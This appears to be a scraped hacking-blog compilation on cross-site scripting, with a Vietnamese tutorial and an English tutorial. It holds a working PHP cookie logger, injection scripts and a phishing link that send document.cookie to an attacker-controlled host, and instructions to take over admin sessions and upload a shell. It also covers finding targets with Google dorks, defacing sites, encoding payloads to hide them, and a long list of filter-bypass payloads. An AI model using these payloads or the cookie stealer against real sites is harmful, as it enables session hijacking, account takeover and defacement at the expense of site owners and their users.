Ebook XSS Attacks


xss

This book is all about XSS. It will cover these topics on XSS.

Cross-site Scripting Fundamentals.

The XSS Discovery Toolkit

XSS Theory

XSS Attack Methods

Advanced XSS Attack Vectors

XSS Exploited

Exploit Frameworks

XSS Worms

Preventing XSS Attacks

Download

Khai thác lỗi xss thế nào?


Lỗi xss là lỗi cho phép thực thi trái phép script trái phép trên client người dùng có thể tham khảo thêm tại đây Cross Site Scripting

thường thì trước kìa tại hạ quậy phá cho phép thực thi câu lệnh

<script>

window.location=’”http:///xxxx.yyy”;

</script>

Trong đó http:///xxxx.yyy là 1 trang tươi mát nào đó Winking smile mục đích là cho admin giải trí trong những lúc mệt mỏi Open-mouthed smile

Bây giờ gặp site lổi tại hạ không dại gì làm thế nữa, vì làm thế chả làm được gì mà còn giúp nó fix bug nè, rồi giúp nó biết thêm mấy trang tươi mát của mềnh nữa Smile

Khi gặp site lỗi xss vấn đề bây giờ là lấy cookie của admin Smile, sau đó đăng nhập với vai trò là admin rồi thích làm gì thì làm :”>

để test site có lấy được cookie toàn vẹn hay không chúng ta thử test bằng cách gõ vào address câu lệnh đơn giản như sau :

javascript:alert(document.cookie);

Ví dụ mình lấy trang http://thamhue.com/forum.php chúng ta đăng nhập vào và dùng firebug để xem cookie như hình

image

chúng ta thực hiện câu lệnh trên và so sánh cookie của firebug

image

Hey ya, nó khác rồi, không khai thác được, nếu nó lỗi xss thì cho nó về trang tươi mát cho bỏ tức Sad smile

Chúng ta tìm site khác. giả sử có 1 site mô đó lỗi xss và lấy được cooki, chúng ta sẽ viết 1 script cho return về trang của mình để lưu cookie xong rồi return nó về trang nào đó tùy mình, mục đích là lấy được cooki thôi mà Sad smile

Giả sử mình có một host free php đi, chúng ta vào tạo 1 file có tên là cc.php và 1 file text có tên là cookie.txt

file cc.php

<?php
$myFile = "cookie.txt";
$fh = fopen($myFile, ‘a+’);
$bien=$_REQUEST[‘cc’].":".$_REQUEST[‘url’]."\n";
fwrite($fh,$bien);
fclose($fh);
echo("<script>window.location=’".$_REQUEST[‘url’]."’;</script>");
?>

file cooki.txt để trống và checkmod cho phép đọc&ghi Sad smile

ví dụ tại hạ đã làm và đã upload lên file có địa chỉ

http://vitinh2nd.com/cc.php

http://vitinh2nd.com/cookie.txt

Khi gặp site http://xyz.xxx lỗi xss ta tìm viết đoạn script sau :

<script>

window.location=”http://vitinh2nd.com/cc.php?cc=”+document.cookie+”&url=http://xyz.xxx”;

</script>

Giải thích : khi admin vào và thực thi script này thì sẽ chạy đến trang của mềnh rồi save cooki vào file cookie.txt rồi return lại trang gốc, mục đích lưu url để biết domain nào mà khai thác, thứ hai là để thằng admin nào đó gà nó tưởng site bị lỗi gì :”>

Vậy là xong, vậy sau khi lấy được cooki mình làm thế nào để đăng nhập :”>

các bạn có thể dùng addon Cookie Manager của Firefox để edit và thêm các trường của cooki sau đó F5 rồi đăng nhập Smile như hình

image

 

Kết luận : có phải xss là cách duy nhất để lấy cookie? cũng có nhiều cách ví dụ như những các sau:

ví dụ vào một trang mà có editor có cho phép sửa mã html các bạn có thể viết 1 bài dài ca ngợi linh tinh gì đó rồi chèn vào cái link dạng như vào đây xem tiếp

<a href=”#” onclick=”javascript:window.location=’http://vitinh2nd.com/cc.php?cc=’+document.cookie+’&url=http://xyz.xxx’;” >Click vào đây để xem chi tiết</a>

Nó click vào thì thực hiện câu lệnh trên Smile

Cách thứ hai dùng kỹ thuật chém gió lừa tình Smile cách này hay có thể xem tuyệt kỹ chém gió tại bài : https://tranphuochung.wordpress.com/2011/07/21/chem-gio-la-gi/

Dụ victim cái này phải chém cho hay : ví dụ như anh/chị gõ lệnh này trên trình duyệt

javascript:window.location=”http://vitinh2nd.com/cc.php?cc=”+document.cookie+”&url=http://xyz.xxx”;

sẽ hack được tiền hay đại loại để xem lỗi hay gì gì thế tùy vào người hót Smile

vậy lỗi xss này có thể khai thác bằng cách đăng nhập vào admin sau đó up shell lên sever rồi lấy dữ liệu của victim Smile

Cách khắc phục thì mấy bác có thể search google, trình độ em chỉ biết có thế có gì sai mấy bác đừng có chém em mà tội Sad smile

Cross Site Scripting (XSS)


‘XSS’ also known as ‘CSS’ – Cross Site Scripting. It is a very common vulnerability found in Web Applications, ‘XSS’ allows the attacker to INSERT malicous code, There are many types of XSS attacks, I will mention 3 of the most used. This kind of vulnerability allows an "attacker" to inject some code into the applications affected in order to bypass access to the website or to apply  "phishing" on falls users.
                                                      This technique is also used for website Hacking.
Types of XSS


There are actually three types of Cross-Site Scripting, commonly named as:

– DOM-Based XSS
– Non-persistent XSS
– Persistent XSS

DOM-Based : The DOM-Based Cross-Site Scripting allow to an attacker to work not on a victim website but on a victim local machine: the various operative system usually includes "since born" some HTML pages created for differents aims, but as long as the humans do mistakes this HTML pages often can be exploited due to code vulnerabilities.
The DOM-Based XSS exploits these problems on users local machines in this way:

– The attacker creates a well builded malicious website

– The ingenuous user opens that site

– The user has a vulnerable page on his machine

– The attacker’s website sends commands to the vulnerable HTML page

– The vulnerable local page execute that commands with the user’s privileges
  on that machine.

– The attacker easily gain control on the victim computer.
Non-Persistent : The non-persistent XSS are actually the most commons vulnerabilities that can be found on the Net. It’s commonly named as "non-persistent" because it works on an immediate HTTP response from the victim website: it show up when the webpage get the data provided by the attacker’s client to automatically generate a result page for the attackers himself. Standing on this the attacker could provide some malicious code and try to make the server execute it in order to obtain some result.
The most common applying of this kind of vulnerability is in Search engines in website: the attacker writes some arbitrary HTML code in the search textbox and, if the website

is vulnerable, the result page will return the result of these HTML entities.
Persistent : The persistent XSS vulnerabilities are similar to the second type (Non-persistent XSS), because both works on a victim site and tries to hack users informations and the difference is that in websites vulnerables to Persistent XSS the attacker doesn’t need to provide the crafted url to the users, because the website itself permits to users to insert fixed data into the system: this is the case for example of "guestbooks". Usually the users uses that kind of tool to leave messages to the owned of the website and at a first look it doesn’t seems something dangerous, but if an attacker discover that the system is vulnerable can insert some malicious code in his message and let ALL visitors to be victim of that.
This works when the tool provided (the guestbook in the example) doesn’t do any check on the content of the inserted message: it just inserts the data provided from the user into the result page.


How to Find XSS Vulnerabilities:-
To start finding these Vulnerabilities you can start checking out Blogs, Forums, Shoutboxes, Comment Boxes, Search Box’s, there are too many to mention.
Using ‘Google Dorks’ to make the finding easyier, Ok if you wanna get cracking, goto google.com and type inurl:"search.php?q=" now that is a common page and has alot of results. Also note that most sites have XSS Vulnerabilities, its just having a good eye, and some good knowledge on how to bypass there filteration.
Basics of XSS:-
Well now lets start learning some Actual Methods, the most common used XSS injection is :
<script>alert("hackingandtips.blogspot.com")</script>
now this will alert a popup message, saying "hackingandtips.blogspot.com" without quotes.
So,use "search.php?q=" and you can simple try the following on a website with the same thing,
http://website.com/search.php?q=<script>alert("hackingandtips.blogspot.com&quot;)</script>
There are good chances of it working, but dont be worried if it dont, just try diffrent sites. You can insert HTML not just javascript :
http://website.com/search.php?q=<br><br><b><u>hackingandtips.blogspot.com</u></b&gt;
if you see the bold text on the page and newlines then you knows its vulnerable.
Example:

XSS Bollywood


How to Deface a Website using XSS ?
Well now you understand how XSS works, we can explain some simple XSS deface methods, there are many ways for defacing i will mention some of the best and most used, the first one being IMG SCR, now for those of you who dont know html, IMG SCR
is a tag, that displays the IMAGE linked to it on the webpage.
<html><body><IMG SRC="http://website.com/yourDefaceIMAGE.png"></body></html&gt;
ok now if you change the link to a valid picture link, and save it and run it you will see what i mean. Right now say you have found a Shoutbox, Comment box, or anything that shows your data after you submitted it you could insert the following to make the picture display on the page.
<IMG SRC="http://site.com/yourDefaceIMAGE.png"&gt;
The other tags are not needed has the page will already have them. Ok it helps to make your picture big so it stands out and its clear the site got hacked. Another method is using FLASH videos, its the same has the method below but a more stylish deface.
<EMBED SRC="http://site.com/xss.swf&quot;
That will execute the flash video linked to it. Or maybe using a pop or redirection as :
<script>window.open( "http://www.hackersonlineclub.tk/&quot; )</script>
There are many others ways that you can found using Google or other website. Mine purpose is to make you understand the concept 🙂
How to Cookie Stealing using XSS ?
I decided to add this has its the most usefull method of XSS. First learn how to make cookie logger from here: How To Make A Cookie Stealer Php script ?
ok now you have it save it has a .php file and upload to your server, remember to create the file ‘log.txt’ too
and chmod it to 777, ok now find a XSS vulnerable website, any attack type will do ok now your gonna want to insert this code.
window.location = "http://yourServer.com/cookielogger.php?c="+document.cookie
or
document.location = "http://yourServer.com/cookielogger.php?c="+document.cookie
now when user visits the page that got injected too, they will be sent to the site, and cookie will be stolen the second one is more stealth. Watch your file now for cookies, then you can hijack there session 😀
but now you ask what if my site has not got, this kind of attack, it only shows data once and dont store it. Well lets say we had a page search.php?q= we can use the following code to make a maliouc url from it and maybe hex, base64 encode it so people cant see the code
http://site.com/search.php?q=document.location = "http://yourServer.com/cookielogger.php?c="+document.cookie


How to Bypass Filtration ?
Alot of sites may seem vulnerable but not executing the code, well to solve this read
this. Some common methods to bypass filtration is
‘)alert(‘xss’);
or
");alert(‘xss’);
that will do the same thing has <script>alert("XSS")</script> on a vulnerable server. You can also try hexing or base64 encoding your data before you submit, Please note its bad practice to use alert("XSS") to test for XSS, because some sites block the keyword "XSS" before so we using "hackingandtips.blogspot.com".
Some other ways to bypass filtration
website.com/search.php?q="><script>alert(“xss test”)</script>
website.com/search.php?q="><script>alert("xss test!")</script>
website.com/search.php?q="><script>alert("hackingandtips.blogspot.com");</script>
website.com/search.php?q="><script>alert(/hackingandtips.blogspot.com");</script>
website.com/search.php?q=//"><script>alert(/hackingandtips.blogspot.com/);</script>
website.com/search.php?q=abc<script>alert(/hackingandtips.blogspot.com/);</script>
website.com/search.php?q=abc"><script>alert(/hackingandtips.blogspot.com/);</script>
website.com/search.php?q=abc"></script><script>alert(/hackingandtips.blogspot.com/);</script>
website.com/search.php?q=abc//abc"></script>alert(/hackingandtips.blogspot.com/);</script>
website.com/search.php?q=000"><script></script><script>alert(hackingandtips.blogspot.com);</script>
website.com/search.php?q=000abc</script><script>alert(/hackingandtips.blogspot.com/);</script>
website.com/search.php?q=–<script>"></script>alert(/hackingandtips.blogspot.com/);</script>
website.com/search.php?q=pwned<script>document.write(‘hackingandtips.blogspot.com’);</script>
website.com/search.php?q=pwned</script><script>document.write(hackingandtips.blogspot.com);</script>
website.com/search.php?q=pwned’)alert(hackingandtips.blogspot.com);//
website.com/search.php?q=pwned";)alert(hackingandtips.blogspot.com);//
website.com/search.php?q=pwned");alert(/hackingandtips.blogspot.com/);//
website.com/search.php?q=pwned//"></script><script>location.href=’javascript:alert(/hackingandtips.blogspot.com/);</script>
website.com/search.php?q="><img src=’javascript:alert(‘hackingandtips.blogspot.com’);’>
website.com/search.php?q="><script src=’http://malicous js'</script>


Advanced XSS – way to bypass magic quotes filtration:
Ok now we are going to learn about some good techniqes. I have came across many
sites where ‘Magic Quotes’ is on and therfore rendering some commands useless. Fear not, i have come up with a way using char codes (Decimals), to convert char code to Ascii. The functions to turn CharCodes (Decimals) into ASCII, you can find a complete table here


http://www.asciitable.com/

http://easycalculation.com/

This will help you write what you want, In my examples ill be writing "HOC" this is the following code
72 79 67
Ok now we got the Decimal value of our string, we need to know what function in javascript converts this.
String.fromCharCode()
is suitable for this kinda things, its easy to setup, im gona give it my args below.
String.fromCharCode(72, 79, 67)
Ok now "String.fromCharCode(72, 79, 67)" Is a JAVA (ASCII) way of saying "HOC".
And to use this with alerts etc, you dont need to use quotes, as it acts as a variable.
<script>alert(String.fromCharCode(72, 79, 67))</script>
For More Script Coding Of XSS Visit

http://ha.ckers.org/xss.html